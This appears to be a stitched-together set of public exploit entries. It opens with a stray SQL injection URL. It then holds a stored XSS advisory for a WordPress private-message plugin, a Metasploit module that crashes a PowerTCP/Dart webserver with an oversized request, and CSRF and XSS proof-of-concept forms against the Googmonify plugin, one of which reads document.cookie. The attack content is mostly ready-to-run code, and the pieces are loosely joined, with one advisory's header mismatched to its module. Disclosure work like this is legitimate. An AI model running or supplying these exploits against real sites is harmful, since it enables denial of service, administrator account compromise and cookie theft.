http://www.example.com/mailertest/users/register.php?form_id=2&apos;[SQLi]

# Exploit Title: WordPress MDC Private Message Persistent XSS # Date: 8/20/15 # Exploit Author: Chris Kellum # Vendor Homepage: http://medhabi.com/ # https://wordpress.org/plugins/mdc-private-message/ # Version: 1.0.0 ===================== Vulnerability Details ===================== The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.) to execute an XSS attack against an Administrator. Proof of Concept: Place <script>alert('Hello!')</script> in the message field of a private message and then submit. Open the message and the alert window will fire. =================== Disclosure Timeline =================== 8/16/15 - Vendor notified. 8/19/15 - Version 1.0.1 released. 8/20/15 - Public Disclosure.

source: https://www.securityfocus.com/bid/55761/info PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users. PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected. require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Description' => %q{ 'Name' => 'Dart Webserver <= 1.9.0 Stack Overflow', Dart Webserver from Dart Communications throws a stack overflow exception when processing large requests. } , 'Author' => [ 'catatonicprime' ], 'Version' => '$Revision: 15513 $', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-3819' ], ], 'DisclosureDate' => '9/28/2012')) register_options([ Opt::RPORT(80), OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust', '520000' ]) ]) end def run serverIP = datastore['RHOST'] if (datastore['RPORT'].to_i != 80) serverIP += ":" + datastore['RPORT'].to_s end size = datastore['SIZE'] print_status("Crashing the server ...") request = "A" * size + "\r\n\r\n" connect sock.put(request) disconnect end end

[+] Exploit Title : Wordpress Googmonify Plug-in XSS/CSRF [+] Exploit Author : Ehsan Hosseini [+] Date: 2015-08-21 [+] Vendor Homepage : https://wordpress.org/plugins/googmonify/ [+] Software Link : https://downloads.wordpress.org/plugin/googmonify.zip [+] Version : 0.8.1 [+] Tested On : Windows FireFox [+] CVE : N/A =============================== Vulnerable Code : googmonify.php - Line 190,194,208 <input id="PID" name="PID" type="text" value="<?php echo $pid; ?>"> <input id= "Limit" name="Limit" type="text" value="<?php echo $limit; ?>" size="5"> <input id="AID" name="AID" type="text" value="<?php echo $aid; ?>"> =============================== Exploit 1 (Just CSRF): <form method="POST" action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php"> <input name="PID" type="hidden" value='Ehsan Hosseini'> <input name="Limit" type="hidden" value="0"> <input name="Analytics" type="hidden" value="0" > <input name="AID" type="hidden" value="Ehsan Hosseini"> <input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;"> </form> Exploit 2 (CSRF & XSS): <form method="POST" action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php"> <input name="PID" type="hidden" value='"><script>alert(document.cookie)</script>'> <input name="Limit" type="hidden" value="0"> <input name="Analytics" type="hidden" value="0" > <input name="AID" type="hidden" value='"><script>alert(/Ehsan Hosseini/)</script>'> <input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;"> </form> =============================== Patch : googmonify.php - Line 190,194,208 <input id="PID" name="PID" type="text" value="<?php echo htmlspecialchars($pid); ?>"> <input id= "Limit" name="Limit" type="text" value="<?php echo htmlspecialchars($limit); ?>" size="5"> <input id="AID" name="AID" type="text" value="<?php echo htmlspecialchars($aid); ?>"> =============================== Discovered By : Ehsan Hosseini.